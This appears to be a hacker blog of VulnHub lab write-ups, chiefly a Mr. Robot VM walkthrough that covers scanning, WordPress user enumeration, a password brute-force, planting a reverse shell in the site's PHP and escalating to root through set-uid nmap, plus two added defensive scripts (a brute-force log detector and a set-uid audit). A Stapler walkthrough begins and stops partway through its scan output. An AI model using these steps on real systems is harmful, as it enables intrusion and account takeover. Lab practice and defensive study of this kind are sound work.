Reaping bytes, one shell at a time: A journey to becoming a 1337H@x0r! through the thoughts and actions of a n00b. By ByteReaper.<br />
<br />
<h2>fsociety - Mr. R0b0t</h2>
Posted 2016-07-05.<br />
<a href="https://www.vulnhub.com/entry/mr-robot-1,151/" target="_blank">Mr. Robot</a> vulnerable VM by jason<br />
<br />
"Based on the show, Mr. Robot. <br />
This VM has three keys hidden in different locations. Your goal is to
find all three. Each key is progressively difficult to find. <br />
The VM isn't too difficult. There isn't any advanced exploitation or
reverse engineering. The level is considered beginner-intermediate."<br />
<br />
Let's Reap Some Bytes<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><img alt="" border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtQRoh0o7AjJUlmBRbwLOHW2z2brapO6GztBdFpLuiEmljyhE8d3x68DCVK6mAqqadkJFD1W8ZFxxCqpLUeclPFHkbOZVK5F97APGmT1TtdrfGaP7vt68mnTUlj-f2RTk_5W2BkeMhyphenhyphenSo/s640/netdiscover.png" style="margin-left: auto; margin-right: auto;" title="test" width="640" /></td></tr>
<tr align="left"><td class="tr-caption" style="text-align: center;">Command: netdiscover -r 10.10.10.0/24</td><td class="tr-caption"></td><td class="tr-caption"></td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlXrlVJMrgiL1INbwwuVswCaypIFLhftFVo5kNa0S9Xhjcia1LbsNWboHQ3d02WWa3ekSQVvDcwCOdTXrgYRYxd7kuTGtpcLPaeRs6IwvcQdVf0t7ZNQCA39DYE-b9ZegGLu1_tizNeU/s1600/nmap.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSlXrlVJMrgiL1INbwwuVswCaypIFLhftFVo5kNa0S9Xhjcia1LbsNWboHQ3d02WWa3ekSQVvDcwCOdTXrgYRYxd7kuTGtpcLPaeRs6IwvcQdVf0t7ZNQCA39DYE-b9ZegGLu1_tizNeU/s640/nmap.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Command: nmap -sS -Pn -p1-65535 10.10.10.4</td><td class="tr-caption" style="text-align: left;"></td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"></td><td class="tr-caption" style="text-align: center;"></td></tr>
</tbody></table>
<br />
<div class="separator" style="clear: both; text-align: left;">
Sweet. Nothing but http/https running. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;width:100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_vkIzW1kUKg7REqyaOj3bs2AxU1SOcsKseZn9T85lWZj9_mDebquq0yRzFZdOR2wFGqesTCMMxo11rR3BrQpca07yr1ZlXSkQPg-FWUg_BX4X8UHI-2U5l5meS2GxQriv913oAXwSb48/s1600/nikto_port_80.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_vkIzW1kUKg7REqyaOj3bs2AxU1SOcsKseZn9T85lWZj9_mDebquq0yRzFZdOR2wFGqesTCMMxo11rR3BrQpca07yr1ZlXSkQPg-FWUg_BX4X8UHI-2U5l5meS2GxQriv913oAXwSb48/s640/nikto_port_80.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: nikto -host 10.10.10.4</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
Nice, WordPress. This should definitely help us get a reverse shell.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZahQaoc_IggEv1JCkJXvKhOlwdH4a0Bxk2Yf0byZoIpQaWeIgae3AgXOBT34lvQ5BIBk_ikyRBhiWgINTrabRZPrNrIz450NYd93o6itPwrr71K8PJcIDnNW1QhHeEwN8FjiowarIc1A/s640/wpscan_robots.png" style="margin-left: auto; margin-right: auto;" width="640" /></td></tr>
<tr align="center"><td class="tr-caption">Command: wpscan --url http://10.10.10.4</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
WPScan reveals much of the same usual information. However, nikto did not tell us that a robots.txt was present, so I will wget the robots.txt file and see if there are any other clues to be found.</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpr-I5MT9grlB_FqgcEssqgjj2q0_sOe6L_QCNiBzg5YtLcDuN5QHnnyIdpwu0VdMqhDL5Bxjw7q0q2bVR_Qsa43w9KBq6GdKM9nsR0KObYPITd6eDB5QAj365nx3QNjwyGYsP-xNPcmg/s1600/wget_robots.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpr-I5MT9grlB_FqgcEssqgjj2q0_sOe6L_QCNiBzg5YtLcDuN5QHnnyIdpwu0VdMqhDL5Bxjw7q0q2bVR_Qsa43w9KBq6GdKM9nsR0KObYPITd6eDB5QAj365nx3QNjwyGYsP-xNPcmg/s640/wget_robots.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: wget http://10.10.10.4/robots.txt</td></tr>
</tbody></table>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;width:100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge65ELPIutpdGqbWCj3rE9J6vghF4_QxRuMRdbAbiMICKldlJ62vXe4juJgWlbb8qW1w61-f5Dpy4wx7nTBbvgddNaNsfPwXxj3Zt59Z7x21qhCp1VwAU6Qs80H3nqLwWCE8AUiX7hrXE/s1600/cat_robots.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge65ELPIutpdGqbWCj3rE9J6vghF4_QxRuMRdbAbiMICKldlJ62vXe4juJgWlbb8qW1w61-f5Dpy4wx7nTBbvgddNaNsfPwXxj3Zt59Z7x21qhCp1VwAU6Qs80H3nqLwWCE8AUiX7hrXE/s640/cat_robots.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Command: cat robots.txt</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
So robots.txt reveals our first key and an fsocity.dic file. We use wget to retrieve both.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First Key: 073403c8a58a1f80d943455fb30724b9</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
User Enumeration: </div>
<div class="separator" style="clear: both; text-align: left;">
So I decided to reinvent the wheel and create my own WordPress user enumeration tool. (WPScan can do this, but I wanted to write some Python of my own, for learning's sake.)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvkRTURq0phVsGxlDO-jvOWsMhyvbyIyuMRcds9r0Zons9EhDsD_l4564mj92wFtkI2HLrHuv9QLG7q21NmupysyPCvSJFvFmlkniPaw-ZxVpcwI_21aovj6UHdev7V9J8EX2WVQfuvA/s1600/userenum_python.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDvkRTURq0phVsGxlDO-jvOWsMhyvbyIyuMRcds9r0Zons9EhDsD_l4564mj92wFtkI2HLrHuv9QLG7q21NmupysyPCvSJFvFmlkniPaw-ZxVpcwI_21aovj6UHdev7V9J8EX2WVQfuvA/s640/userenum_python.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">My Code</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: red;">****NOTE: I opted not to use threading due to the small amount of enumeration that needs to occur. I would add multithreading if I were using very large username lists.****</span></b></div>
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhML8m3G6rr7BiPGMF14PMMr-t6PHZ3q0QK8xH1OV4kmrlkH5T2MBcu0UZVv667gH0UJCuTMWuhKqJl7FV-YCLyPS8QTxbxR6lAmAXMu882ad1G6ZZb89jjhIUy4JVxng4iNryKid-sFXg/s1600/userenum_output.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhML8m3G6rr7BiPGMF14PMMr-t6PHZ3q0QK8xH1OV4kmrlkH5T2MBcu0UZVv667gH0UJCuTMWuhKqJl7FV-YCLyPS8QTxbxR6lAmAXMu882ad1G6ZZb89jjhIUy4JVxng4iNryKid-sFXg/s640/userenum_output.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names http://10.10.10.4/wp-login.php</td></tr>
</tbody></table>
<br />
<br />
Found user: elliot (the name list I used is from <a href="http://www.outpost9.com/files/wordlists.html" target="_blank">outpost9</a>)<br />
<br />
Using the username elliot we should be able to brute-force the password. I decided that the fsocity.dic file would be a good dictionary to use, as it was given to us by the author :)<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4riNgwXp-y-PLN-fAzCC3jIJ93tgY_1LOh-ezTd2lsKqRLP_NYESltv3FI_UzFcHmXNJZGk0hI3mj7muZqkdwq_V1uyd-wuEYcwUKZfa6QwcjCuP-wIkJ_Q450TTbgbFyyWUe2gyK12s/s1600/wpscan_password.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4riNgwXp-y-PLN-fAzCC3jIJ93tgY_1LOh-ezTd2lsKqRLP_NYESltv3FI_UzFcHmXNJZGk0hI3mj7muZqkdwq_V1uyd-wuEYcwUKZfa6QwcjCuP-wIkJ_Q450TTbgbFyyWUe2gyK12s/s640/wpscan_password.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: wpscan --url http://10.10.10.4 --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot</td></tr>
</tbody></table>
<br />
Awesome, we have a hit... after 4 hours... because the password was the second-to-last word in the list... thanks for that...<br />
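A 4-hour, 50-thread dictionary run against wp-login.php (and the username enumeration before it) is very loud in the web server's access log. As an added example that is not code from this write-up, here is a detector over constructed Apache-format log lines; the source IPs 10.10.10.50/60/99 and the timestamps are constructed, and the "probable hit" rule relies on WordPress answering a failed login with HTTP 200 (the form is re-rendered) and a successful one with a 302 redirect.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access-log format. The sample lines built below are
# constructed for this example; the VM's own logs were not part of the write-up.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/wp-login.php"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def analyse_wp_login(lines, window_s=60, threshold=20):
    """Flag sources that POST to wp-login.php at least `threshold` times inside
    any `window_s` second window (lines must be in chronological order).
    WordPress answers a failed login with 200 and a successful one with a 302
    to wp-admin, so a 302 arriving while a source is already over threshold is
    reported as a probable credential hit."""
    recent = defaultdict(deque)   # ip -> timestamps of its recent login POSTs
    result = {}                   # ip -> {"peak": n, "hit": bool}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not rec["path"].startswith(LOGIN_PATH):
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            entry = result.setdefault(rec["ip"], {"peak": 0, "hit": False})
            entry["peak"] = max(entry["peak"], len(q))
            if rec["status"] == 302:
                entry["hit"] = True
    return result


def make_line(ip, offset_s, method="POST", path=LOGIN_PATH, status=200):
    """Build one constructed log line `offset_s` seconds after a fixed start time."""
    ts = datetime(2016, 7, 5, 11, 0, 0, tzinfo=timezone.utc) + timedelta(seconds=offset_s)
    return (f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
            f'{status} 512 "-" "Mozilla/5.0"')


def sample_log():
    """Constructed sample: one source hammering wp-login.php (30 attempts in
    30 s, the last answered with a 302), one legitimate user with two failed
    tries, and some unrelated GETs."""
    lines = [make_line("10.10.10.50", 5), make_line("10.10.10.50", 40)]
    lines += [make_line("10.10.10.60", i, method="GET", path="/") for i in range(0, 50, 5)]
    lines += [make_line("10.10.10.99", i) for i in range(29)]
    lines.append(make_line("10.10.10.99", 29, status=302))
    return sorted(lines, key=lambda l: parse_line(l)["ts"])


if __name__ == "__main__":
    for ip, info in analyse_wp_login(sample_log()).items():
        print(f"{ip}: peak {info['peak']} login POSTs per minute, probable hit: {info['hit']}")
```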
<br />
Upon logging in as elliot I was able to modify the site's PHP to add a reverse shell.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;width:100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAYmG5uwcZCXFu_98YqkqKGEcPBs9VZYA3hQ7trV08W4on-FCQtEvFKD4_L3RTB27umcNwCKP46cbsM-uM5db1F_hdc6vzLBemI0NpxTqau3525lGB-ZeJw-jQMFfhH2O2yR2167kLZiM/s1600/revshell_start.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAYmG5uwcZCXFu_98YqkqKGEcPBs9VZYA3hQ7trV08W4on-FCQtEvFKD4_L3RTB27umcNwCKP46cbsM-uM5db1F_hdc6vzLBemI0NpxTqau3525lGB-ZeJw-jQMFfhH2O2yR2167kLZiM/s640/revshell_start.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Command: nc -lvp 80</td></tr>
</tbody></table>
Sweet, we have a reverse shell. Now let's power it up into a proper TTY.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI9krR-xheNMzf67MhHOO1kztoFRp7E-EGFLo_8Dzzf5OjAFRQWZq-v6S3SksB0mg-0Dph8aoMuoeDe_Jv7xx82IrqYTZVum_DJucVCfYJiHZ5-fgm3nktvqllC6cAjYDhYxzwESx_UnI/s1600/revshell_powerup.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI9krR-xheNMzf67MhHOO1kztoFRp7E-EGFLo_8Dzzf5OjAFRQWZq-v6S3SksB0mg-0Dph8aoMuoeDe_Jv7xx82IrqYTZVum_DJucVCfYJiHZ5-fgm3nktvqllC6cAjYDhYxzwESx_UnI/s640/revshell_powerup.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: python -c "import pty;pty.spawn('/bin/bash');"</td></tr>
</tbody></table>
Looking at /home we can see that the robot user's home directory is readable.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEithUbDu5OyP3W1NOfabprpqKJHiCxWBJu89HdcOd0UYPJ_BR0O8nGKZs8FbV3TU1RQ0HhCf8HTziDwXQBqF9Ll_y22hlILANhDOcL0azoUQh6pHW8HU7Lu-4RnWG7lmWmoNemNRch6K1o/s1600/revshell_LS_robotHome.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEithUbDu5OyP3W1NOfabprpqKJHiCxWBJu89HdcOd0UYPJ_BR0O8nGKZs8FbV3TU1RQ0HhCf8HTziDwXQBqF9Ll_y22hlILANhDOcL0azoUQh6pHW8HU7Lu-4RnWG7lmWmoNemNRch6K1o/s640/revshell_LS_robotHome.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: ls -lah</td></tr>
</tbody></table>
<br />
Sweet, the 2nd flag (we cannot read it currently, and admittedly I forgot to go back for it).<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwsJl2ecPXFg1aHSpvcglaCwxzo2ebj7ACfSwQ5j1ZsyQewbzjn1pj3GrUNyJlS-n4Rh6-F8Ey-l_1X-cpEbMQW0KkrNjRTVTjXTDhs1wnh0EWyIj8XGZfImdue1Cg1vjYz-u_vX4fZA/s1600/revshell_cat_passwd.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHwsJl2ecPXFg1aHSpvcglaCwxzo2ebj7ACfSwQ5j1ZsyQewbzjn1pj3GrUNyJlS-n4Rh6-F8Ey-l_1X-cpEbMQW0KkrNjRTVTjXTDhs1wnh0EWyIj8XGZfImdue1Cg1vjYz-u_vX4fZA/s640/revshell_cat_passwd.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: cat password.raw-md5</td></tr>
</tbody></table>
<br />
Dropping the hash into Google resulted in "abcdefghijklmnopqrstuvwxyz". lul.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIM9h27vH2h-E3_ptxJ63kOD6MSO8b7eSQ-_uoU7HkVyonHgLPODW98vSgadCBX4oEN6x_Te76XXR337oZEKnm14DV-_xTiJUUg5D23a3O8C6eqbIjfzoxF_WDdENyjiNgYXh2tlkCBsE/s1600/revshell_su_robot.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIM9h27vH2h-E3_ptxJ63kOD6MSO8b7eSQ-_uoU7HkVyonHgLPODW98vSgadCBX4oEN6x_Te76XXR337oZEKnm14DV-_xTiJUUg5D23a3O8C6eqbIjfzoxF_WDdENyjiNgYXh2tlkCBsE/s640/revshell_su_robot.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: su robot</td></tr>
</tbody></table>
<br />
(again I forgot to cat the 2-of-3-flag.txt file)...<br />
<br />
I did a good amount of looking around for sudo -l, crons, etc. and found nothing much with any of them. What I did find was the SUID bit set on nmap. Awesome, nmap has an interactive mode. Let's see if we can get anything with it.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsb6lhzqcSeoEI8w16XnViS1cW0cZ-9Jsa1U0-pQ5tgXeIVXj_VTiPUFAL2ZyAhInlogoiSW5lRuy5qvGSkOXOgFqNuYw_wiIJKYs7ysBqz9y7tFp5BgALyqNSe5ck4lCHBmibomuSYNo/s1600/revshell_nmap.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsb6lhzqcSeoEI8w16XnViS1cW0cZ-9Jsa1U0-pQ5tgXeIVXj_VTiPUFAL2ZyAhInlogoiSW5lRuy5qvGSkOXOgFqNuYw_wiIJKYs7ysBqz9y7tFp5BgALyqNSe5ck4lCHBmibomuSYNo/s640/revshell_nmap.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Command: nmap --interactive</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left; width: 100%;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI39DDyW2aTk_FP9eOcv_oF9zeuftr9QQyiroyIn8Etqxhf0iKV1XNXdEwDGX8mPFAXgl46PIYasIAzDcRgBKMU9yYgMVTJbvSUFZfQelagsShuO-l1nw3QullzONkJz1Y184b74XwWmc/s1600/revshell_root.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI39DDyW2aTk_FP9eOcv_oF9zeuftr9QQyiroyIn8Etqxhf0iKV1XNXdEwDGX8mPFAXgl46PIYasIAzDcRgBKMU9yYgMVTJbvSUFZfQelagsShuO-l1nw3QullzONkJz1Y184b74XwWmc/s640/revshell_root.png" width="640" /></a></td></tr>
<tr align="center"><td class="tr-caption">Sweet. We got r00t. and our third flag.</td></tr>
</tbody></table>
<br />
w00t w00t. flag 3 ==> 04787ddef27c3dee1ee161b21670b4e4<br />
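The root path here is a set-uid nmap, which is the kind of thing a periodic host audit should catch before an attacker does. As an added example that is not part of the write-up, this script walks a tree, reports set-uid files, splits them into an expected baseline, shell-capable binaries and everything else, and can strip the bit; the BASELINE and SHELL_CAPABLE sets are illustrative assumptions, not authoritative lists, and build_demo_tree() creates a constructed directory to run against instead of the real filesystem.

```python
import os
import stat
import tempfile

# Binaries that can spawn a shell or read/write arbitrary files when they run with
# elevated privileges; nmap (this VM's build has --interactive) is the one the
# write-up abuses. Illustrative set, not a complete one.
SHELL_CAPABLE = {"nmap", "vim", "vi", "find", "bash", "sh", "python", "perl",
                 "awk", "less", "more"}

# Set-uid binaries a stock Linux box is expected to carry. Assumed baseline for
# the example; a real audit would generate this from a known-good image.
BASELINE = {"sudo", "su", "passwd", "mount", "umount", "ping", "ping6", "chsh",
            "chfn", "gpasswd", "newgrp", "pkexec"}


def find_setuid(root):
    """Walk `root` (without following symlinks) and return the sorted paths of
    regular files that have the set-uid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:          # vanished or unreadable entry: skip it
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def classify(paths, baseline=BASELINE, dangerous=SHELL_CAPABLE):
    """Split set-uid paths into shell-capable (act now), expected (baseline)
    and unexpected (investigate) buckets, keyed on the binary's basename."""
    report = {"shell_capable": [], "expected": [], "unexpected": []}
    for path in paths:
        name = os.path.basename(path)
        if name in dangerous:
            report["shell_capable"].append(path)
        elif name in baseline:
            report["expected"].append(path)
        else:
            report["unexpected"].append(path)
    return report


def strip_setuid(path):
    """Clear the set-uid bit on `path`. Returns True if the bit was cleared,
    False if it was not set to begin with."""
    st = os.lstat(path)
    if not st.st_mode & stat.S_ISUID:
        return False
    os.chmod(path, stat.S_IMODE(st.st_mode) & ~stat.S_ISUID)
    return True


def names(paths):
    """Basenames of a list of paths, for compact reporting."""
    return [os.path.basename(p) for p in paths]


def build_demo_tree():
    """Constructed demo tree: a set-uid nmap (shell-capable), a set-uid ping
    (expected) and an ordinary cat. Returns the temporary root directory."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    for name, mode in (("nmap", 0o4755), ("ping", 0o4755), ("cat", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")   # placeholder body; only the mode matters here
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    found = find_setuid(demo_root)
    for bucket, paths in classify(found).items():
        print(f"{bucket}: {names(paths)}")
    for path in classify(found)["shell_capable"]:
        print(f"clearing set-uid on {path}: {strip_setuid(path)}")
```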
<br />
<br />
Sorry for the abbreviated ending to this tutorial. I was trying to finish asap before the long weekend.<br />
<br />
Thanks again to vulnhub for hosting this awesomeness.<br />
<br />
<h2>Excuse me...I believe you have my stapler</h2>
Posted 2016-06-27 by ByteReaper.<br />
<h3><a href="https://www.vulnhub.com/entry/stapler-1,150/" target="_blank">Stapler</a></h3>
He110 w0rld! Today I will be sharing a guide to completing the Stapler VM hosted on <a href="https://www.vulnhub.com/" target="_blank">VulnHub</a>. This VM was created by the one and only <a href="https://www.twitter.com/@g0tmi1k" target="_blank">@g0tmi1k</a>.<br />
<br />
As always there will be spoilers within this guide, so use as little or as much as you need.<br />
<br />
***With all these VMs there are always multiple ways to r00t the box***<br />
<br />
<br />
<pre><code>+---------------------------------------------------------+
| |
| __..--''\ |
| __..--'' \ |
| __..--'' __..--'' |
| __..--'' __..--'' | |
| \ o __..--''____....----"" |
| \__..--''\ |
| | \ |
| +----------------------------------+ |
| +----------------------------------+ |
| |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| Name: Stapler | IP: DHCP |
| Date: 2016-June-08 | Goal: Get Root! |
| Author: g0tmi1k | Difficultly: ??? ;) |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
| |
| + Average beginner/intermediate VM, only a few twists |
| + May find it easy/hard (depends on YOUR background) |
| + ...also which way you attack the box |
| |
| + It SHOULD work on both VMware and Virtualbox |
| + REBOOT the VM if you CHANGE network modes |
| + Fusion users, you'll need to retry when importing |
| |
| + There are multiple methods to-do this machine |
| + At least two (2) paths to get a limited shell |
| + At least three (3) ways to get a root access |
| |
| + Made for BsidesLondon 2016 |
| + Slides: https://download.vulnhub.com/media/stapler/ |
| |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman |
| + ...and shout-outs to the VulnHub-CTF Team =) |
| |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
| |
| --[[~~Enjoy. Have fun. Happy Hacking.~~]]-- |
| |
+---------------------------------------------------------+</code></pre>
<pre><code>Let's reap some bytes...</code></pre>
<h3><code>Discovery</code></h3>
<pre><code><span style="font-size: small;"><b>Command</b></span>: netdiscover -r 192.168.153.0/24</code></pre>
<pre><code><span style="color: red;">***Please note your IP range can/will differ***</span></code></pre>
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Currently scanning: 192.168.153.0/24 | Screen View: Unique Hosts</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">_____________________________________________________________________________</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">IP At MAC Address Count Len MAC Vendor / Hostname</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-----------------------------------------------------------------------------</td></tr>
